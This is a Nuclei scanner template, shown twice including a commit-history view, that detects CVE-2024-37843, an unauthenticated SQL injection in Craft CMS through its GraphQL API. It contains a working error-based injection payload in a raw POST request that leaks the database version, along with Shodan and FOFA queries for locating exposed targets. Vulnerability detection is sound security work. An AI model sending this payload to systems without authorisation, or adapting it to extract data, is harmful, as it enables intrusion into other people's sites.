nuclei-templates/http/cves/2024/CVE-2024-37843.yaml

id: CVE-2024-37843

info:
  name: Craft CMS <=v3.7.31 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
  reference:
    - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql
    - https://github.com/gsmith257-cyber/CVE-2024-37843-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-37843
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39447
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:"craftcms"
      - http.favicon.hash:"-47932290"
      - "X-Powered-By: Craft CMS"
    fofa-query:
      - body=craftcms
      - icon_hash=-47932290
    publicwww-query: craftcms
  tags: cve,cve2024,craftcms,sqli

variables:
  matcher: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /api/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type:application/json

        {"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "General error: 1105 XPATH syntax error: '\\n{{matcher}}"

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a00463044022002dca2f2b0925cbe4564e9abdf3f70b914472fcecde703539b7834ad0d4c8aea02207c9493c976a30ef2f6ad0e7be9a8c8edd366b67477a88c89ad7c574e50005def:922c64590222798bb761d5b6d8e72950
Create CVE-2024-37843.yaml 2024-07-24 08:48:47 +00:00			`id: CVE-2024-37843`

			`info:`
			`name: Craft CMS <=v3.7.31 - SQL Injection`
			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
			`Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.`
			`reference:`
			`- https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql`
			`- https://github.com/gsmith257-cyber/CVE-2024-37843-POC`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2024-37843`
			`cwe-id: CWE-89`
			`epss-score: 0.00091`
			`epss-percentile: 0.39447`
			`cpe: cpe:2.3:a:craftcms:craft_cms::::::::`
			`metadata:`
			`vendor: craftcms`
			`product: craft_cms`
			`shodan-query:`
			`- cpe:"cpe:2.3:a:craftcms:craft_cms"`
			`- http.html:"craftcms"`
			`- http.favicon.hash:"-47932290"`
			`- "X-Powered-By: Craft CMS"`
			`fofa-query:`
			`- body=craftcms`
			`- icon_hash=-47932290`
			`publicwww-query: craftcms`
			`tags: cve,cve2024,craftcms,sqli`

			`variables:`
fix error 2024-07-24 08:51:57 +00:00			`matcher: "{{rand_base(4)}}"`
Create CVE-2024-37843.yaml 2024-07-24 08:48:47 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /api/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type:application/json`

			{"query":"query IntrospectionQuery {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}

			`skip-variables-check: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "General error: 1105 XPATH syntax error: '\\n{{matcher}}"`

			`- type: word`
			`part: content_type`
			`words:`
			`- "application/json"`
Auto Template Signing [Thu Jul 25 11:32:30 UTC 2024] :robot: 2024-07-25 11:32:30 +00:00			`# digest: 490a00463044022002dca2f2b0925cbe4564e9abdf3f70b914472fcecde703539b7834ad0d4c8aea02207c9493c976a30ef2f6ad0e7be9a8c8edd366b67477a88c89ad7c574e50005def:922c64590222798bb761d5b6d8e72950`